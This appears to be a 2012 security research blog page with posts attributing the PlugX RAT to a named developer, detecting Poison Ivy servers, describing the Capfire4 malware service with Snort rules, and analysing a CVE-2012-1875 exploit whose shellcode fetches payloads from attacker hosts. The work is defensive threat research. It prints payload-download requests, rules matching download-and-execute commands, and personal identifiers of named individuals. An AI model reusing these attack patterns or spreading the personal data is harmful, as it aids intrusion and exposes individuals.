AlienVault R&D Labs Portal. Get the latest news from our research.
Header

Tracking down the author of the PlugX RAT

September 13th, 2012 | Posted by jaime.blasco in APT | Attacks | News - (Comments Off)

Some days ago, TrendMicro published some information about a new version of a RAT called PlugX. From the last few months we have been tracking a group using the PlugX RAT that has been attacking different targets especially in Japan, Taiwan, Korea and against Tibetan organizations and individuals.

In this post we will focus on the intelligence we have extracted from the payloads of the attacks and how we used this information to track the author of the RAT that is very likely to be involved in the attacks as well.

During the past few months we have seen some spearphishing campaigns against Tibetan targets using mainly Microsoft Office Exploits (CVE-2012-0158). Those documents used a very tricky technique; the payload dropped was a benign Nvidia executable (NvSmart.exe), a DLL (NvSmartMax.dll) and a binary file (boot.ldr) This technique was explained by Symantec as well.

NvSmart.exe

https://www.virustotal.com/file/523d28df917f9d265cd2c0d38df26277bc56a535145100ed82e6f5fdeaae7256/analysis/

 

As we can see the binary file is signed by Nvidia since it is a benign file used on some Nvidia applications. Once NvSmart.exe is executed, it loads NvSmartMax.dll. The attackers drop a modified version of NvSmartMax.dll which executes the binary content present on boot.ldr that contains the actual malicious code.

Since NvSmart.exe is configured to run when the computer starts and it contains a valid digital signature, it will bypass some of the OS restrictions and the malicious code will be executed when the system boots.

Once the payload is executed, a decoy file is shown to the user as in most of the attacks we have seen in the past few years.

Here is an example of some of the decoy content used by the attackers:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

It happens that in most of the boot.ldr files we have found the RAT called PlugX.

At the beginning of our investigations some months ago, we found out that in some of the PlugX binaries we were able to extract some debug paths like:

Hash: c1c80e237f6fbc2c61b82c3325dd836f3849ca036a28007617e4e27ba2f16c4b

Debug Path: d:\work\plug4.0(nvsmart)(sxl)\shellcode\shellcode\XPlug.h

Compilation date: 6/17/2012 16:44:58

 

Hash: 1a091c2ddf77c37db3274f649c53acfd2a0f14780479344d808d089faa809a_HHDL’s Birthday Celebration.doc

Debug Path: d:\work\Plug3.0(Gf)UDP\Shell6\Release\Shell6.pdb

Compilation date: 6/17/2012 16:44:58

 

Hash: 42813b3a43611efebf56239a1200f8fc96cd9f3bac35694b842d9e8b02a

Debug Path: d:\work\plug4.0(nvsmart)\shellcode\shellcode\XPlug.h

Compilation date: 5/26/2012 7:16:08

 

Hash: 28762c22b2736ac9728feff579c3256bd5d18bdfbf11b8c00c68d6bd905af5b8

Debug Path: d:\work\plug3.1(icesword)\shellcode\shellcode\XPlug.h

Compilation date: 6/14/2012 6:06:00
It seems that there are several versions of the RAT and if you take a look at the binaries you will realize that there are some changes and new capabilities in each version.

We searched through our collection to see if we could find other XPlug samples apart from the ones dropped by the malicious documents we had. We found some other samples:

Hash: 3b01677582e7a56942a91da9728c6251- financial_report.exe

Debug Path: C:\Users\whg\Desktop\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 6/17/2012 16:44:58

 

Hash: 60ee900d919da8306b7b6dbe7e62fee49f00ccf141b2e396f5a66be51a00e34f

Debug Path: C:\Documents and Settings\whg\\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 2012-03-12 07:04:12

 

Hash: c00cd2dcddbb24383a3639ed56e68a24dc4561b1248efa4d53aa2b68220b4b2a

Debug Path: C:\Users\whg\Desktop\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 3/12/2012 14:23:58

As we can see the debug paths found on those files are a bit more interesting since the path contains a username “whg”. We have two different paths, “C:\Documents and Settings\whg\” and  “C:\Users\whg\” so it is likely that in the first case the author is using a Windows XP system and in the second one he is using a Vista/7 system.

With this information, we began to search binary files that contain similar debug paths. Our search found an application called SockMon that leads us to http://www.cnasm.com/view.asp?classid=49&newsid=320 and http://www.cnasm.com/view.asp?classid=49&newsid=315.

The debug paths that we found in files that belong to a different SockMon version are the following ones:

C:\Users\whg\Desktop\SockMon2011\SockMon\UnitCache.pas

c:\Documents and Settings\whg\SockMon2010\RunProtect\Release\RunProtect.pdb

c:\Documents and Settings\whg\\SockMon2010\SmComm\Release\SmComm.pdb

We also found another library called vtcp (http://www.cnasm.com/vtcpsdk/) that contains the following debug path:

C:\Users\whg\Desktop\vtcp11.0lib\vtcpT0\UnitMain.pas

Does this all look familiar to you?. It seems that the user “whg” has compiled these components and he is also running a couple of machines with different paths that correspond to the ones we found on the XPlug RAT.

If we take a look at cnasm.com we can find the following contact information:

email: whg0001 at 163.com

QQ: 312016

So the mail address also coincide with the username we found in the debug path of the RAT samples.

Let’s see what we find about whg0001 at 163.com. The mail address was used as the administrative contact of the domain chinansl.com back in 2000:

Domain Name      : chinansl.com

PunnyCode        : chinansl.com

Creation Date    : 2000-08-08 00:00:00

Updated Date     : 2012-02-29 11:26:22

Expiration Date  : 2013-08-08 00:00:00

 

Registrant:

Organization   : chinansl technology co.,itd

Name           : lishiyun

Address        : Room E8BC , XiangFu Garden , 3rd Southern portion of 2nd ringroad , Chengdu , Si

City           : chengdushi

Province/State : sichuansheng

Country        : china

Postal Code    : 610041

 

Administrative Contact:

Name           :

Organization   : chinansl technology co.,itd

Address        :

City           : chengdushi

Province/State : sichuansheng

Country        : china

Postal Code    : 610041

Phone Number   :

Fax            : 086-028-85459578

Email          : whg0001@163.com

In this link you can find more information about the company, overview:

Company Name: CHINANSL TECHNOLOGY CO.,LTD.

Address: Chengdu National Information Security Production Industrialization Base , 2nd Floor ,No.8 Chuangye   Road

Telephone: 02866853362

Custom Code: 5101730218773

Company Code: 730

Account-opening Bank: Xisanqi Sub-branch, Beijing Branch, Bank of China

Account Name: Beijing Lingtong Economic Consulting Co., Ltd

Account Number: 813715881608091001

 

 
 

 
 

 
 
 
 

From the information we collected it seems to be a Chinese company related to the security industry. Of course!

We also found a software component called “Parent Carefree Filter”

https://www.virustotal.com/file/3babb326615b899e976a1a9dc51ec04118701a5de702494f1d363194060c5db7/analysis/

publisher…………….: CHINANSL

product………………: Parent Carefree Filter

internal name…………: FamHook

file version………….: 3, 0, 0, 1

original name…………: FamHook.dll

copyright…………….: CHINANSL

description…………..: Parent Carefree Filter

And of course we found similar debug paths on the file:

c:\Documents and Settings\whg\Pnw(all)\Pc()\FamHook\Release\FamHook.pdb

You can find some advisories that Chinansl published back to 2000:

CHINANSL Security Advisory(CSA-200110)

Tomcat 4.0-b2 for winnt/2000 show “.jsp” source Vulnerability

CHINANSL Security Advisory(CSA-200011)

PHP AND APACHE Vulnerability

CHINANSL Security Advisory(CSA-200012)

Ultraseek Server 3.0 Vulnerability

CHINANSL Security Advisory(CSA200013)

IBM WCS local user exceed his authority to access another file

CHINANSL Security Advisory(CSA-200105)

Tomcat 3.0 for win2000 Directory traversal Vulnerability

CHINANSL Security Advisory(CSA-200106)

JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 Directory traversal Vulnerability

CHINANSL Security Advisory(CSA-200108)

Tomcat 3.2.1 for win2000 Directory traversal

CHINANSL Security Advisory(CSA-200107)

IBM WCS 4.0.1 + Application Server 3.0.2 for Solaris 2.7 show “.jsp” source Vulnerability.

CHINANSL Security Advisory(CSA-200109)

Tomcat 4.0-b1 for winnt/2000 show “.jsp” source Vulnerability.

 

About whg0001 we can find several references on the Internet about him.

https://www.xfocus.net/bbs/index.php?act=ST&f=1&t=54500

http://bbs.krshadow.com/thread-58032-1-1.html

They describe him as “Virus expert. Proficient in assembly.”.

And finally here is the CSDN profile where you can find a photo of him:

 

 

 

 

 

 

 

 

At this point you must be thinking we cannot accuse whg of being related to the XPlug RAT and the targeted campaigns just for a couple of debug paths inside the binary, can we?

Ok, here is the final touch. After searching for more versions of the PlugX RAT we found these two samples:

2ba7f1cc1f46a17ccfbef6b327d8c4e47f9d56922debcad27e5db569f4cf818d

51e50d810172591ee04e12cfce0792f3154356588eacadc01288e3a4fda915fb

They contains this debug path:

i:\work\plug2.0()\shellcode\shellcode\XPlug.h

and the following URL:

http://tieba.baidu.com/f?kz=866965377

that seems to be used as a test or to check connectivity (more info in future posts).

Surprisingly when you open the URL you can see the following:

 

 

 

 

 

 

 

is this guy familiar to you?

With the information we have, we can say that this guy is behind the active development of the PlugX RAT. We can also say he has probably some inside of the operations since this path

“d:\work\plug4.0(nvsmart)\shellcode\shellcode\XPlug.h” tells us that he knew the RAT was going to be weaponized through the Nvsmart technique to be used in the spearphishing campaigns.

According to the information on this research  a previous version of this malware also called Thoper/Tvt/Sogu was used to compromise SK Communications in South Korea back in 2011.

 

 

 

 

 

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , , ,

Nmap Script to detect Poison Ivy Clients

July 6th, 2012 | Posted by jaime.blasco in Lua | Malware - (1 Comments)

I want to share with you a Nmap script that will help you detecting Poison Ivy clients (due to the Poison Ivy nomenclature, the term client refers to the malicious server where the victims connect in order to receive commands).

The Poison Ivy’s protocol uses a challenge-response handshake in order to perform the authentication. The server (victim) sends an unencrypted 256 bytes random challenge to the client (malicious server). Once the server receives the challenge, it encrypts the data and sends the response back to the server. The encryption uses the Camellia block cipher that has a 16 bytes block size.

I have written a small Nmap script that sends the challenge handshake  to the client and expects a 256 byte response. It is able to detect if the Poison Ivy’s password used is the default one (“admin”).

Sample output:

<code> jaime$ ./nmap -P0 -v --script=poison -p3460 192.168.1.38 

Starting Nmap 6.01 ( http://nmap.org ) at 2012-07-06 12:12 CEST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Parallel DNS resolution of 1 host. at 12:12
Completed Parallel DNS resolution of 1 host. at 12:12, 0.10s elapsed
Initiating Connect Scan at 12:12
Scanning 192.168.1.38 [1 port]
Discovered open port 3460/tcp on 192.168.1.38
Completed Connect Scan at 12:12, 0.00s elapsed (1 total ports)
NSE: Script scanning 192.168.1.38.
Initiating NSE at 12:12
Completed NSE at 12:12, 0.01s elapsed
Nmap scan report for 192.168.1.38
Host is up (0.00067s latency).
PORT     STATE SERVICE
3460/tcp open  unknown
|_poison: Poison Ivy client detected with default password, admin

 </code>

 

I hope you enjoy it!

References: http://badishi.com/own-and-you-shall-be-owned/

Update: Thanks to @badishi for pointing that we can check the next 4 bytes after the response (d0 15 00 00) that do not depend on the key.

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , ,

Capfire4 malware, RAT software and C&C service together

June 21st, 2012 | Posted by Alberto Ortega in Attacks | Malware - (3 Comments)

A big amount of the malware out there are RAT (Remote administration tool) samples. This is software created by people specialized on it, people that develop, improve and sell their tools. It  has capabilities that let the attacker spy on the victims with actions like screen capturing, keylogging, password stealing, command execution and remote access and controlling.

Their clients usually pay to gain access to the tools and additional services like support, zero or low antivirus detection, …

We are going to see a service we have been studying recently. Clients pay for the service and then they gain access to a web portal where they can generate personalized Trojans, manage the infected victims via the web browser and host the malware on their “cloud”.

Creators promote itself as a service to remote control computers and “recover passwords”.

It means that clients don’t have to mess with almost any technical issues, and they don’t need special skills or knowledge. The providers supply the tools, the hosting, and the Command and Control server.

When you login in your personal account you can see the main menu, tutorials and shortcuts.

The control panel uses HTTPS with a valid certificate.

Then you can create a new personalized malware (Trojan Horse) that will be generated in real time.

They take care of the antivirus detections for you. Created samples have a very low antivirus detection ratio (2/42).

Then the time to host the malware comes. Clients can choose between some fake domains that seem legitimate. The administrator of the service have bought two domains to create the fake subdomains.

cf.pro.br
as.bio.br

The domain whois data from the main website is hidden but the previous domains we mentioned are not. This way we can discover some information about the authors:

http://whois.domaintools.com/cf.pro.br


domain: cf.pro.br
owner: Pedro Henrique
ownerid: 401.407.278-92
country: BR
created: 20090510
changed: 20100713

Finally, once infected, you can easily manage your victims. You can perform remote control on the machine, password stealing, and command execution.

Uninstall software, Reboot, Logoff user, Kill process, Send DOS command, Download an execute file, Open web page.

If you need to infect more targets, you will have to pay for them.

Malware communication with the C&C is done using HTTP. For command execution they use other protocol from port 9000.

The C&C IP is from Brazil and always the same, which is included in our IP reputation database -> 174.142.93.226.

You can use the following rules to detect the communication traffic and command execution requests:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”MALWARE Capfire4 register machine”; flow:to_server,established; content:”GET”; depth:3; uricontent:”/registraMaquina”; content:”Host|3A| api|2E|capfire4|2E|com”; http_header; classtype:trojan-activity; sid:5000080; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”MALWARE Capfire4 update machine status”; flow:to_server,established; content:”POST”; depth:4; uricontent:”/updMaqStatus”; content:”Host|3A| api|2E|capfire4|2E|com”; http_header; classtype:trojan-activity; sid:5000081; rev:1;)

alert tcp $EXTERNAL_NET 9000 -> $HOME_NET any (msg:”MALWARE Capfire4 remote command execution”; flow:to_server,established; content:”|10|”; depth:1; content:”|14|”; distance:1; within:1; content:”.exe”; classtype:trojan-activity; sid:5000082; rev:1;)

alert tcp $EXTERNAL_NET 9000 -> $HOME_NET any (msg:”MALWARE Capfire4 remote kill process”; flow:to_server,established; content:”|10|”; depth:1; content:”|14|taskkill”; distance:1; within:9; classtype:trojan-activity; sid:5000083; rev:1;)

alert tcp $EXTERNAL_NET 9000 -> $HOME_NET any (msg:”MALWARE Capfire4 remote download and exec”; flow:to_server,established; content:”|10|”; depth:1; content:”|14|wget -c”; distance:1; within:8; classtype:trojan-activity; sid:5000084; rev:1;)

As a conclusion, we can mention that the ease to use frameworks to monetize malware is getting more and more popular on the Internet as they let people without technical skills to easily manage their victims.

Alberto Ortega

More Posts

, , ,

Ongoing attacks exploiting CVE-2012-1875

June 13th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | IP Reputation | Malware - (Comments Off)

Yesterday, Microsoft released the June 2012 Black Tuesday Update including patches for a vulnerability affecting a wide range versions of Internet Explorer. The exploit works across different Windows versions ranging from XP to Windows 7.

The 0day has been actively exploited as reported by mcafee.

We have been able to find several servers hosting similar versions of the exploit. One of them was detected by our OTX system a couple of days ago:

http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip=113.10.241.239

The exploit supports a wide range of languages and Windows versions and seems to be very reliable.

 

The exploit includes return-oriented programming (ROP) techniques that helps bypassing OS protections.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

The shellcode downloads the payload from the following url:

GET /javaw.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 113.10.241.239
Connection: Keep-Alive

https://www.virustotal.com/file/705cf0c95f7f0d351d480df4b48f723c7f72ce4e16b14a3a52f99081707e5a32/analysis/

 

 

 

 

 

A couple of days ago the AV detection rate was 3/41.

 

Other versions of the exploit have been found in different servers requesting the following payloads:

GET /english/cala.exe HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 140.109.236.143
Connection: Keep-Alive

and

GET /img/books.cab HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.villagXXXX
Connection: Keep-Alive

https://www.virustotal.com/file/1581c0555956f7f62c717e303b6f8785207f107fbb4e375c1e50788d9a4a2f07/analysis/

 

 

 

 

 

 

 

The payloads seems to be RAT (Remote Access Tools).

The C&C server for that RAT is online (ip address 219.90.117.132)

219.90.117.128 – 219.90.117.159
China Shenzhen Soul Tech Co. Ltd

We will release more information as soon as we analyze the components involved on this attack.

 

 

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , ,